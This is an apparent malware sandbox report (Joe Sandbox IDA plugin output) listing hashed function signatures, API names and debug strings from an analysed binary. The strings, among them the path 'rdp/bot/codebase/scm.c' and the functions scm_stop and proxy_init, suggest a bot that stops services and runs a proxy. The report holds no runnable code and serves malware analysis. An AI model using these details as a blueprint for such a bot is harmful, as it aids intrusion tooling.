                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseControlErrorHandleLastOpen
                                                      • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                                      • API String ID: 3311966420-638458398
                                                      • Opcode ID: 6effc39bc33150b246a3b0806f0a8cd94433cc8002ca06d808ad53691723484b
                                                      • Instruction ID: e824c6afee1b3a2f4be3f5c69235bba1a46ecab86f4f73ca5ba0dcbdfe64785e
                                                      • Opcode Fuzzy Hash: 6effc39bc33150b246a3b0806f0a8cd94433cc8002ca06d808ad53691723484b
                                                      • Instruction Fuzzy Hash: 05011E69B0AA0F61FA1A5F15E46837517A0BF07F45F455835CA0D56397EE3EE4448308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: _stricmp
                                                      • String ID: (name != NULL)$C:/Projects/rdp/bot/codebase/scm.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$scm_find
                                                      • API String ID: 2884411883-2863218139
                                                      • Opcode ID: 9c744c752a8d13fac720ce47f4c91faa4cb8d9a72ad3e2420a16b255f704ab11
                                                      • Instruction ID: c54abc5a251b96afdcd11d718d283a3013a3805821e74c1b75664122c62b7a13
                                                      • Opcode Fuzzy Hash: 9c744c752a8d13fac720ce47f4c91faa4cb8d9a72ad3e2420a16b255f704ab11
                                                      • Instruction Fuzzy Hash: C6011E69B0BA0E60FE5A8F50E46837662A0AF82B84F441431DA4E063E2FF2DE545C618
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastclosesocketfflushfwrite
                                                      • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                      • API String ID: 152032778-2221966578
                                                      • Opcode ID: ba9079067d19179ebe6bf6baf7c38d802999d82c0a886534fc5ab55fce1e80a4
                                                      • Instruction ID: e9f42af2b3e6a9bcf609810d580586ba7fa3bda208f21903292cc242f67d04e9
                                                      • Opcode Fuzzy Hash: ba9079067d19179ebe6bf6baf7c38d802999d82c0a886534fc5ab55fce1e80a4
                                                      • Instruction Fuzzy Hash: 0EF09A2CF0A54F92EA025F65E8393B427109F17F71F140731D67D063E3AE6EA4468308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteSectionfclose
                                                      • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                      • API String ID: 3387974148-4247581856
                                                      • Opcode ID: 0386638f395edafe5936c2303bdd69071192acad3c4db6da9497f3915dde1170
                                                      • Instruction ID: fc9a47719e6080e8c3b955c0605f68437e61d27f067c4251bcd348a9cadc06f8
                                                      • Opcode Fuzzy Hash: 0386638f395edafe5936c2303bdd69071192acad3c4db6da9497f3915dde1170
                                                      • Instruction Fuzzy Hash: 90F09268B0B64B85FE469F90E8B937922A0AF57F04F550535C44D463A3DF7DA0498788
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt
                                                      • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                      • API String ID: 1729277954-536111009
                                                      • Opcode ID: 3af4584f76d2fb1eb2b8971791e2a72c24c52c03efe502b67099081bc507a2ff
                                                      • Instruction ID: 2358a83b61d8a3d091b70a4a38de3c3dae03e1a47b1721e25605663e82b2cc6d
                                                      • Opcode Fuzzy Hash: 3af4584f76d2fb1eb2b8971791e2a72c24c52c03efe502b67099081bc507a2ff
                                                      • Instruction Fuzzy Hash: FDF02B75B0954A4AE3219F16F8142656650BF8AB60F008235EE2D83BE2DF7CC40ACB04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteSection
                                                      • String ID: Done$[I] (%s) -> %s$proxy_init
                                                      • API String ID: 166494926-991486753
                                                      • Opcode ID: 4f71e2278afa38fab80a577d95c5849ae083bedf5349287d73a3270e4413966a
                                                      • Instruction ID: 27bdf05ba7abae301916736368a323cfbffb82779e9e0d2cc30f9b0396117799
                                                      • Opcode Fuzzy Hash: 4f71e2278afa38fab80a577d95c5849ae083bedf5349287d73a3270e4413966a
                                                      • Instruction Fuzzy Hash: 2AF0A428B0BA4F84EA029F11E86937823A0BF42F44F824436C14E123A2EF2DB585D308
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Byte$CharMultiWide$Lead_errno
                                                      • String ID:
                                                      • API String ID: 2766522060-0
                                                      • Opcode ID: 81ec57064b8ca875c22becc66c91008ae0d2c7c680337a35ba01ac1b1b792e8e
                                                      • Instruction ID: 1c91f7735694ea57e1bfc4c070f793aee1a7ebedbd2774c3bbc548a34815a1c6
                                                      • Opcode Fuzzy Hash: 81ec57064b8ca875c22becc66c91008ae0d2c7c680337a35ba01ac1b1b792e8e
                                                      • Instruction Fuzzy Hash: D231E779B0D285C6EF324F21A4183BD6A92AB56F84F098135DA88437D6EB3CD9418704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: 61e21130357b37cd81f6d1512ed87388e2a6a6d129d6e2aace3b4f80914820c7
                                                      • Instruction ID: 00f1a4ed8fc63dd6ab0bacb9f96225f3ebd3da01cfbc2debe91e21f30068fe3c
                                                      • Opcode Fuzzy Hash: 61e21130357b37cd81f6d1512ed87388e2a6a6d129d6e2aace3b4f80914820c7
                                                      • Instruction Fuzzy Hash: 4E01A16AB0A20F56F67B6E5568B837A11916F43F14F080936CF1D463D3DD6EA8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: 1634e07a3328971604e5169c055727c2c513d5ed5b150af53c3d8470e1163217
                                                      • Instruction ID: 34e60244f411173dbe1392bed15dce6eb75096c8ce3d87090d6e1490e3ced298
                                                      • Opcode Fuzzy Hash: 1634e07a3328971604e5169c055727c2c513d5ed5b150af53c3d8470e1163217
                                                      • Instruction Fuzzy Hash: D301C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D467D3DD6EE8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: b526e17983245773430d356cdc30f84027d352f6b6b6bfdf8799228e69828814
                                                      • Instruction ID: 792e325ef03243799b72eb5030e343bbb68caee5aef415e1d834f67f38024971
                                                      • Opcode Fuzzy Hash: b526e17983245773430d356cdc30f84027d352f6b6b6bfdf8799228e69828814
                                                      • Instruction Fuzzy Hash: 9901C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: 2e61b3f3e4032e7fa6d86b4fbe77a08d986a96dccc63925e0ee8d4b810f0da17
                                                      • Instruction ID: 2333381ac9576d2ae3a832b882abc950f1c63464ae3261121fe4fee52aec6362
                                                      • Opcode Fuzzy Hash: 2e61b3f3e4032e7fa6d86b4fbe77a08d986a96dccc63925e0ee8d4b810f0da17
                                                      • Instruction Fuzzy Hash: 6C01C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: aa5773378fbe60be62a2ea5a99c298c9b8d1239413411f021b2dce72be0a71be
                                                      • Instruction ID: 34e60244f411173dbe1392bed15dce6eb75096c8ce3d87090d6e1490e3ced298
                                                      • Opcode Fuzzy Hash: aa5773378fbe60be62a2ea5a99c298c9b8d1239413411f021b2dce72be0a71be
                                                      • Instruction Fuzzy Hash: D301C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D467D3DD6EE8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: 14c7d16f485ed253f5394b106dc1dafab8eff20a8f8c68b43e631369efa96124
                                                      • Instruction ID: 792e325ef03243799b72eb5030e343bbb68caee5aef415e1d834f67f38024971
                                                      • Opcode Fuzzy Hash: 14c7d16f485ed253f5394b106dc1dafab8eff20a8f8c68b43e631369efa96124
                                                      • Instruction Fuzzy Hash: 9901C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                                      • API String ID: 1725840886-2743387298
                                                      • Opcode ID: f4e7f931e504a2a1fb140ec50f24b7494d84318a6d3580a55bd1e54dbfbee568
                                                      • Instruction ID: 2333381ac9576d2ae3a832b882abc950f1c63464ae3261121fe4fee52aec6362
                                                      • Opcode Fuzzy Hash: f4e7f931e504a2a1fb140ec50f24b7494d84318a6d3580a55bd1e54dbfbee568
                                                      • Instruction Fuzzy Hash: 6C01C46AF0A20F56F67B6E5568B837A11906F43F14F080937CF1D463D3DD6EE8458208
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 0f39f8f63fdc324f6f824097126ab290aaa14f560813b898d1c3570f926614d2
                                                      • Instruction ID: 1459a803e6e236a87b7a4c5b4d1591dab8ab2428c4d66a0e8bb144aef9e01e5b
                                                      • Opcode Fuzzy Hash: 0f39f8f63fdc324f6f824097126ab290aaa14f560813b898d1c3570f926614d2
                                                      • Instruction Fuzzy Hash: 75F05E2BF0B60B41F9579E04B56A7B911412F86F75E0A4931EE5C0B7C3EE3EA8829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 2ba30e3a7e6572846da95a9fdedbe00157d52ad6fe00f33a7bce893260fb9bf9
                                                      • Instruction ID: b8536d3c534875f7fdca097a18aee7be795346cbf00b3b0bc4423efd745160c8
                                                      • Opcode Fuzzy Hash: 2ba30e3a7e6572846da95a9fdedbe00157d52ad6fe00f33a7bce893260fb9bf9
                                                      • Instruction Fuzzy Hash: D5F0542BF0B60B41F9575E04756A7B911412F86F75E0A4931DE5C0B7C3EE3E68829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 252923cb569a6b484768e1c292ae1b9c31b0f94a5564cbb881ebf1110f5eaacc
                                                      • Instruction ID: 9cbbb03314afacb2f28251cbe83a497c4f175c9891488a6b2fb9f8a1c3fd615b
                                                      • Opcode Fuzzy Hash: 252923cb569a6b484768e1c292ae1b9c31b0f94a5564cbb881ebf1110f5eaacc
                                                      • Instruction Fuzzy Hash: C6F0542BF0B60B41F9575E0475667B911412F86F75E0A4931DE5C0B7C3EE3E68829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: c40198cca18dccad730b46d64530ba81c5079ad8e15e9efb13706eec6c25bc73
                                                      • Instruction ID: 793062fe52a452b1fa053d4580130518e988c425989a7ff83fe9f67208eee0ad
                                                      • Opcode Fuzzy Hash: c40198cca18dccad730b46d64530ba81c5079ad8e15e9efb13706eec6c25bc73
                                                      • Instruction Fuzzy Hash: 6DF0542BF0B50B41F9579E0474767B911412F82F64E0A4931DE5C0B7C3EE3E69829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: 8eb4d870f238e91f2d5bbe58b9af2a3275b9deecab1f762123ce48531f5c5a8b
                                                      • Instruction ID: db6111d73d45f4a05f8cc49f29a9dfd6fa3718b85754c939dc64be8175e472f8
                                                      • Opcode Fuzzy Hash: 8eb4d870f238e91f2d5bbe58b9af2a3275b9deecab1f762123ce48531f5c5a8b
                                                      • Instruction Fuzzy Hash: 48F05E2BF0B60B41F9579E04B57A7B911412F86F75E0A4931EE5C0B7C3FE3EA8829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
